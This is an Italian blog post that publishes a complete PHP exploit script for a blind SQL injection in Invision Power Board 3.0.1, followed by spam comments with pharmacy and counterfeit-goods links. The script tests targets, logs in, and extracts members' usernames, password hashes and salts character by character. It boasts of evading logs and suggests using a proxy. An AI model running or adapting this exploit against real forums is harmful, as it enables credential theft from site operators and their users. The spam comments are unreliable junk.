IPB 3.0.1 SQL Injection Exploit

Il ritrovamento di questa nuova falla dell’Invision Power Serivce e pertanto del Forum più usato in rete è stato identificato dal Hacker Cryptovirus e sfrutta l’ormai conosciuta tecnica di SQL Injection .

Dopo il salto l’expoit…

<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// IPB 3.0.1 sql injection exploit
// Version 1.0
// written by Cryptovirus
// http://de.crypt.in/
// 31. january 2010
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
// 4. curl extension autoloading
// 5. log format compatible with passwordspro
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Die, if executed from webserver
//=====================================================================
if(!$cli)
{
 echo "<html><head><title>Attention!</title></head>\n";
 echo "<body><br /><br /><center>\n";
 echo "<h1>Error!</h1>\n";
 echo "This exploit is meant to be used as php CLI script!<br />\n";
 echo "More information:<br />\n";
 echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
 echo "This script will not run through a webserver.<br />\n";
 echo "</center></body></html>\n";
 exit;
}
//=====================================================================
// Print the awesome de.crypt.in logo
//=====================================================================
echo "\n     _                             _     _       ";
echo "\n  __| | ___   ___ _ __ _   _ _ __ | |_  (_)_ __  ";
echo "\n / _` |/ _ \ / __| '__| | | | '_ \| __| | | '_ \ ";
echo "\n| (_| |  __/| (__| |  | |_| | |_) | |_ _| | | | |";
echo "\n \__,_|\___(_)___|_|   \__, | .__/ \__(_)_|_| |_|";
echo "\n                       |___/|_|                  \n\n";
//=====================================================================
// Check if all command line arguments were passed
//=====================================================================
if(!isset($argv[1])||!isset($argv[2])||!isset($argv[3])){
 echo "Usage: php ".$_SERVER['PHP_SELF']." <target> <userid> <option> [login] [password]\n";
 echo "\n";
 echo "NOTE: Login and password are optional, use for forums that require registration.\n";
 echo "Options: 1 - Fetch username, 2 - Fetch password hash\n\n";
 echo "Example: php ".$_SERVER['PHP_SELF']." http://ipb.com/board/ 1 1 foo bar\n";
 die;
}
//=====================================================================
// Set some important variables...
//=====================================================================
$topicname = '';
$url = $argv[1];
$chosen_id = $argv[2];
$ch_option = $argv[3];
if(isset($argv[4])){
 if(isset($argv[5])){
 $user_login = $argv[4];
 $user_pass = $argv[5];
 }
 else{
 echo "Error: Password not specified with username\n";
 die;
 }
}
# Proxy settings
# Be sure to use proxy 🙂
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipb_log.txt'; //Log file

if(!extension_loaded('curl'))
{
 if(!dl('php_curl.dll'))
 {
 die("Curl extension not loaded!\n Fatal exit ...\n");
 }
 else
 {
 echo "Curl loading success\n";
 }
}
//=====================================================================
xecho("Target: $url\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
add_line("==========================================");
add_line("Target: $url");
if(isset($argv[4])){
 login_to_forum($argv[4], $argv[5]);
}
$i = $chosen_id;
echo "Fetching topics from ID $i\n";
 if(!fetch_target_id($i))
 {
 echo "No topics found.\n";
 fwrite(STDOUT, "Last ditch effort, enter topic: ");
 $topicname = trim(fgets(STDIN));
 }
 else echo "Topic found! Hacktime.\n";

// Check chosen option and proceed accordingly
add_line("------------------------------------------");
if($ch_option == 2){
 $hash = get_hash($i);
 $salt = get_salt($i);
 $line = "$i:$hash:$salt";
 add_line($line);
 xecho("\n------------------------------------------\n");
 xecho("User ID: $i\n");
 xecho("Hash: $hash\n");
 xecho("Salt: $salt");
 xecho("\n------------------------------------------\n");
}
else if($ch_option == 1){
 $uname = get_user($i);
 $line = "The username for id $i is $uname";
 add_line($line);
 xecho("$uname");
}
xecho("\nQuestions and feedback - http://de.crypt.in/ \n");
die(" \n");
//////////////////////////////////////////////////////////////////////
function login_to_forum($user, $pass)
{
 global $url;
 $post = 'app=core&module=global&section=login&do=process&username='.$user.'&password='.$pass.'&rememberMe=1';
 $buff = trim(make_post($url, $post, '', $url));
 if(strpos($buff,'The login was successful!')>0){
 xecho("Logged in.\n");
 }
 else{
 xecho("Error: Unable to login.");
 die;
 }
}
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
 global $url;

 $post = 'app=core&module=search&section=search&do=quick_search&search_app=core&fromsearch=1&search_filter_app%5Ball%5D=1&content_title_only=1&search_term=test%2527';
 $buff = trim(make_post($url, $post, '', $url));

 if(strpos($buff,'Moved Permanently')>0)
 {
 die('Ivalid. Try adding trailing slash to url. Exiting ...');
 }

 if(strpos($buff,'No results found for')>0)
 {
 die('Target is patched? Exiting ...');
 }
}
//////////////////////////////////////////////////////////////////////
function fetch_target_id($id)
{
 global $url, $topicname;
 $post = 'app=core&module=search&do=user_posts&mid='.$id.'&view_by_title=1&search_filter_app%5Bforums%5D=1';
 $buff = trim(make_post($url, $post, '', $url));
 if(strpos($buff,'View result')>0){
 $location = strpos($buff,'View result');
 $start = strpos($buff,'>',$location)+1;
 $end = strpos($buff,'</a>',$start);
 $topicname = substr($buff,$start,($end-$start));
 return true;
 }
 else return false;
}
///////////////////////////////////////////////////////////////////////
function get_salt($id)
{
 $len = 5;
 $out = '';
 xecho("Finding salt ...\n");
 for($i = 1; $i < $len + 1; $i ++)
 {
 $ch = get_saltchar($i, $id);
 xecho("Got pos $i --> $ch\n");
 $out .= "$ch";
 xecho("Current salt: $out \n");
 }
 xecho("\nFinal salt for ID $id: $out\n\n");
 return $out;
}
///////////////////////////////////////////////////////////////////////
function get_saltchar($pos, $id)
{
 global $prefix;
 $char = '';
 $min = 32;
 $max = 128;
 $pattern = 'm.member_id='.$id.' AND ORD(SUBSTR(m.members_pass_salt,'.$pos.',1))';
 $curr = 0;
 while(1)
 {
 $area = $max - $min;
 if($area < 2 )
 {
 $post = $pattern . "=$max";
 $eq = test_condition($post);
 if($eq)
 {
 $char = chr($max);
 }
 else
 {
 $char = chr($min);
 }
 break;
 }

 $half = intval(floor($area / 2));
 $curr = $min + $half;
 $post = $pattern . '%253e' . $curr;
 $bigger = test_condition($post);
 if($bigger)
 {
 $min = $curr;
 }
 else
 {
 $max = $curr;
 }
 xecho("Current test: $curr-$max-$min\n");
 }
 return $char;
}
///////////////////////////////////////////////////////////////////////
function get_hash($id)
{
 $len = 32;
 $out = '';
 xecho("Finding hash ...\n");
 for($i = 1; $i < $len + 1; $i ++)
 {
 $ch = get_hashchar($i, $id);
 xecho("Got pos $i --> $ch\n");
 $out .= "$ch";
 xecho("Current hash: $out \n");
 }
 xecho("\nFinal hash for ID $id: $out\n\n");
 return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos, $id)
{
 global $prefix;
 $char = '';
 $pattern = 'm.member_id='.$id.' AND ORD(SUBSTR(m.members_pass_hash,'.$pos.',1))';
 // First let's determine, if it's number or letter
 $post = $pattern . '%253e57';
 $letter = test_condition($post);
 if($letter)
 {
 $min = 97;
 $max = 102;
 xecho("Char to find is [a-f]\n");
 }
 else
 {
 $min = 48;
 $max = 57;
 xecho("Char to find is [0-9]\n");
 }
 $curr = 0;
 while(1)
 {
 $area = $max - $min;
 if($area < 2 )
 {
 $post = $pattern . "=$max";
 $eq = test_condition($post);
 if($eq)
 {
 $char = chr($max);
 }
 else
 {
 $char = chr($min);
 }
 break;
 }

 $half = intval(floor($area / 2));
 $curr = $min + $half;
 $post = $pattern . '%253e' . $curr;
 $bigger = test_condition($post);
 if($bigger)
 {
 $min = $curr;
 }
 else
 {
 $max = $curr;
 }
 xecho("Current test: $curr-$max-$min\n");
 }
 return $char;
}
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_user($id)
{
 $len = 32;
 $out = '';

 xecho("Finding username ...\n");

 for($i = 1; $i < $len + 1; $i ++)
 {
 $ch = get_userchar($i, $id);
 xecho("Got pos $i --> $ch\n");
 $out .= "$ch";
 xecho("Current username: $out \n");
 }

 xecho("\nFinal username for ID $id: $out\n\n");

 return $out;
}
///////////////////////////////////////////////////////////////////////
function get_userchar($pos, $id)
{
 global $prefix;

 $char = '';
 $pattern = 'm.member_id='.$id.' AND ORD(SUBSTR(m.name,'.$pos.',1))';

 // First let's determine, if it's number or letter
 $post = $pattern . '%253e57';
 $letter = test_condition($post);

 if($letter)
 {
 $min = 65;
 $max = 122;
 xecho("Char to find is [a-f]\n");
 }
 else
 {
 $min = 48;
 $max = 57;
 xecho("Char to find is [0-9]\n");
 }

 $curr = 0;

 while(1)
 {
 $area = $max - $min;
 if($area < 2 )
 {
 $post = $pattern . "=$max";
 $eq = test_condition($post);

 if($eq)
 {
 $char = chr($max);
 }
 else
 {
 $char = chr($min);
 }

 break;
 }

 $half = intval(floor($area / 2));
 $curr = $min + $half;

 $post = $pattern . '%253e' . $curr;

 $bigger = test_condition($post);

 if($bigger)
 {
 $min = $curr;
 }
 else
 {
 $max = $curr;
 }

 xecho("Current test: $curr-$max-$min\n");
 }

 return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
 global $url;
 global $topicname;

 $bret = false;
 $maxtry = 10;
 $try = 1;

 $pattern = 'app=core&module=search&section=search&do=quick_search&search_app=core&fromsearch=1&search_filter_app%%5Ball%%5D=1&content_title_only=1&search_term='.$topicname.'%%2527 IN BOOLEAN MODE) AND %s AND MATCH(t.title) AGAINST(%%2527'.$topicname;
 $post = sprintf($pattern, $p);

 while(1)
 {
 $buff = trim(make_post($url, $post, '', $url));

 if(strpos($buff,'Your search for the term <em><strong>')>0)
 {
 $bret = true;
 break;
 }
 elseif(strpos($buff,'No results found for')>0)
 {
 break;
 }
 elseif(strpos($buff, 'Driver Error</title>') !== false)
 {
 die("Sql error! Wrong prefix?\nExiting ... ");
 }
 else
 {
 xecho("test_condition() - try $try - invalid return value ...\n");
 xecho("Will wait 30 seconds for flood control. Expect 2-3 tries.\n");
 xecho("This is going to take years...\n");
 sleep(10);
 $try ++;
 if($try > $maxtry)
 {
 die("Too many tries - exiting ...\n");
 }
 else
 {
 xecho("Trying again - try $try ...\n");
 }
 }
 }

 return $bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
 $ch = curl_init();
 $timeout = 120;
 curl_setopt ($ch, CURLOPT_URL, $url);
 curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
 curl_setopt($ch, CURLOPT_POST, 1);
 curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
 curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');
 curl_setopt ($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
 curl_setopt ($ch, CURLOPT_COOKIEFILE, 'cookies.txt');


 if(!empty($GLOBALS['proxy_ip_port']))
 {
 curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);

 if(!empty($GLOBALS['proxy_user_password']))
 {
 curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
 }
 }

 if(!empty($cookie))
 {
 curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
 }

 if(!empty($referer))
 {
 curl_setopt ($ch, CURLOPT_REFERER, $referer);
 }

 if($headers === TRUE)
 {
 curl_setopt ($ch, CURLOPT_HEADER, TRUE);
 }
 else
 {
 curl_setopt ($ch, CURLOPT_HEADER, FALSE);
 }

 $fc = curl_exec($ch);
 curl_close($ch);

 return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
 global $outfile;
 $line .= "\r\n";
 $fh = fopen($outfile, 'ab');
 fwrite($fh, $line);
 fclose($fh);
}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
 if($GLOBALS['cli'])
 {
 echo "$line";
 }
 else
 {
 $line = nl2br(htmlspecialchars($line));
 echo "$line";
 }
}
///////////////////////////////////////////////////////////////////////
?>

  • – buy generic cialis
    — [url=http://buycialisusa.com/#61017]generic cialis
    [/url] http://buycialisusa.com/#69271 – generic cialis

  • Ciao compaesani [url=http://compracialis.it/it/item/generic_cialis.html#1691]meglio cialis generico o cialis originale[/url] sedia belen
    lpfppcoypwlpjcml scala http://compracialis.it/it/item/generic_cialis.html#9702 cavolfiore yzulfzgtgtt

  • POA1Ov rdvikjqlevzw, [url=http://twcegzkgbamo.com/]twcegzkgbamo[/url], [link=http://ekbzyzqsbwft.com/]ekbzyzqsbwft[/link], http://vcrkocndydkm.com/

  • minecraft – замечательная игра для любого возраста!
    [url=http://minecraftix.ru/board]сервер 1.4.5 майнкрафт[/url]
    [url=http://minecraftix.ru/load/minecraft/soft/11]софт для minecraft[/url]

  • pc to tv video converter shearling hats jamaican blue mnt estate coffee vga cards gps information las vegas coupons schlechty sabatoge [url=http://www.guccijapanonsale.com/]グッチ ショルダーバッグ[/url]
    san francisco giants wallpaper cooler fan olbas oil white blazer paperweights antique [url=http://www.louboutinpumpssalejp.com/]ルブタン[/url]
    job security russian keyboard stickers stop panic attacks now teeth care kid curtain [url=http://www.louboutinpumpssalejp.com/]ルブタン ブーツ[/url]
    poland springs greatest vitamin rvista 06p5263 xbr 40